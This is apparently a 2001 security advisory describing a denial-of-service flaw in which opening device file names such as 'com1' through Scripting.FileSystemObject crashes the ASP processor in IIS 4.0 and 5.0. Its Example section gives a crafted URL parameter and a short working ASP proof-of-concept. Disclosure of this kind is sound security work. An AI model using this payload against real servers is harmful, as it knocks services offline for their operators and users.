|
Release Date: July 5, 2001
Severity:
High
Systems Affected:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0
Description:
Openning and reading of device files (com1, com2, etc.)
using
Scripting.FileSystemObject will crash ASP-processor
(asp.dll).
Example:
1. Local exploit:
If you have permission on creating .asp-file, you can crash
ASP-processor.
2. Remote exploit:
Sometimes filename passing as asp-script param, which open
and read data from file. Passing param as device file will
crash asp-processor.
http://host.int/scripts/script.asp?script=com1
3. ASP-Exploit:
<%
Dim strFileName, objFSO, objFile
Set objFSO =
Server.CreateObject("Scripting.FileSystemObject")
strFileName = "com1"
Set objFile =
objFSO.OpenTextFile(strFileName)
Response.Write objFile.ReadAll
objFile.Close
%>
Solution
Fix Scripting.FileSystemObject (have to check file for
existing before openning.
Vendor Status:
Disclaimer
The information within this paper may change without
notice. Use of this information constitutes acceptance for
use in an AS IS condition. There are NO warranties with
regard to this information. In no event shall the author be
liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any
use of this information is at the user's own risk.
Hyperlinks
http://www.nerf.f2s.com/
Credits
Found by buggzy (buggzy@nerf.ru)
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c) |